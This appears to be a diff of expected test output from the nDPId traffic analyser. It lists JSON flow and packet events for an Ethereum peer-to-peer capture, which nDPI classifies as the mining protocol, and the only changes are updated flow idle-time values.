+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1578508365742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365742,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7O7AqAG4i6L\/0t1gdl\/B\/P6G3qHC44AQECwgIAAAAQEICiLYmKrjm6Oz"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365751,"flow_last_seen":1578508365751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365751,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1578508365751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365751,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLpXAqAG4I+sl2N1jdl9d8bObAAAAALAC\/\/8KAAAAAgQFtAEDAwUBAQgKItiYsQAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1578508365752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365752,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GqJFOL5ObwKgBuHZf3WHPYyPBMSmbmaAScSA0jAAAAgQFrAQCCApPJ9\/rItiYjAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1578508365753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365753,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlpnAqAG4Ti+Tm91hdl8xKZuZz2MjwoAQECzEHgAAAQEICiLYmLJPJ9\/r"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1578508365776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365776,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADsGM5kj6yXYwKgBuHZf3WOqScTQXfGznKAS\/ohykQAAAgQFrAQCCAo1IQWkItiYsQEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1578508365777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365777,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLqHAqAG4I+sl2N1jdl9d8bOcqknE0YAQECyPmwAAAQEICiLYmMg1IQWk"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1578508365781,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365781,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHjqoAAEARyLjAqAG40WGPAXZfw1AAs7BF2l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1578508365813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365813,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAG8nVeRDeiwKgBuHZf3WKbomHRWAgB9KAScSDEJQAAAgQFrAQCCAppF+qfItiYqQEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1578508365813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365813,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4n3AqAG4XkQ3ot1idl9YCAH0m6Jh0oAQECxToAAAAQEICiLYmOdpF+qf"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365828,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365828,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGW5bAqAG4DfsOx91mdl9PCwRhAAAAALAC\/\/\/02wAAAgQFtAEDAwUBAQgKItiY9AAAAAAEAgAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365846,"flow_last_seen":1578508365846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365846,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1578508365846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365846,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtj\/AqAG4I+SeNN1ndl9FuX9aAAAAALAC\/\/\/dzAAAAgQFtAEDAwUBAQgKItiZBAAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365852,"flow_last_seen":1578508365852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365852,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1578508365852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365852,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG3OLAqAG4ijsROt1odl\/ttHvbAAAAALAC\/\/9f7QAAAgQFtAEDAwUBAQgKItiZCQAAAAAEAgAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365885,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365885,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365885,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2crAqAG4z7TO2N1pdl+dzwtmAAAAALAC\/\/8dEQAAAgQFtAEDAwUBAQgKItiZJwAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1578508365813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365813,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAG8nVeRDeiwKgBuHZf3WKbomHRWAgB9KAScSDEJQAAAgQFrAQCCAppF+qfItiYqQEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1578508365813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365813,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4n3AqAG4XkQ3ot1idl9YCAH0m6Jh0oAQECxToAAAAQEICiLYmOdpF+qf"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365828,"flow_last_seen":1578508365828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365828,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1578508365828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGW5bAqAG4DfsOx91mdl9PCwRhAAAAALAC\/\/\/02wAAAgQFtAEDAwUBAQgKItiY9AAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365846,"flow_last_seen":1578508365846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365846,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1578508365846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365846,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtj\/AqAG4I+SeNN1ndl9FuX9aAAAAALAC\/\/\/dzAAAAgQFtAEDAwUBAQgKItiZBAAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365852,"flow_last_seen":1578508365852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365852,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1578508365852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365852,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG3OLAqAG4ijsROt1odl\/ttHvbAAAAALAC\/\/9f7QAAAgQFtAEDAwUBAQgKItiZCQAAAAAEAgAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365885,"flow_last_seen":1578508365885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365885,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1750,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1578508365885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365885,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2crAqAG4z7TO2N1pdl+dzwtmAAAAALAC\/\/8dEQAAAgQFtAEDAwUBAQgKItiZJwAAAAAEAgAA"} 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1578508365899,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1578508365899,"pkt":"KDc3AG3IEBMx8Tl2CABFAACxNvdAACcRcwrKcBxqwKgBuHZfdl8AnfAw9M4wDHlezlLb\/XVAde5xoPK0MYWPqo8wL1hvUi9RDAnTme70\/IGTzT1fYmed3PImx\/QlqjXSlKRDpOJrSqown1EL4xkYxe9gDpH7mkxI5SW3Td37cSNZr69+s5vwesE7AQLyy4RPFs69gun3gnZfoAhIsWiV\/\/bYUAtK\/XBnLAnnp\/ohE29dCVwVPQWUC9vDhF4WIGE="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1578508365903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365903,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGwUMj5J40wKgBuHZf3Weyx8H3Rbl\/W6AS\/ogN9wAAAgQFrAQCCAqAlezxItiZBAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1578508365903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365903,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtkvAqAG4I+SeNN1ndl9FuX9bssfB+IAQECwq5AAAAQEICiLYmTiAlezx"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1578508365903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365903,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGwUMj5J40wKgBuHZf3Weyx8H3Rbl\/W6AS\/ogN9wAAAgQFrAQCCAqAlezxItiZBAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1578508365903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365903,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtkvAqAG4I+SeNN1ndl9FuX9bssfB+IAQECwq5AAAAQEICiLYmTiAlezx"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1578508365919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365919,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc44MAAEARsuTAqAG4p1Z6MnZfdl8AiFGIcmRL\/sJ+HmBFF7n+UfEKJLvDdBgdKzSECJqxpMbuAWJCFnSyz1LOPGHXvK4XvgJfd8y9TVVaoZxiY0SgM1nuu1KcsxmveZ1Iboux45kEq0UHna5hbl98Bua+Zy2zz7pAAAHdBMuEfwAAAYJ2X4J2X8mEp1Z6MoJ2X4CEXhYgYQU="} 00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1578508365925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365925,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMG5s7PtM7YwKgBuHZf3WknDwC1nc8LZ6AScSCqDAAAAgQFrAQCCApcfI6dItiZJwEDAwc="} 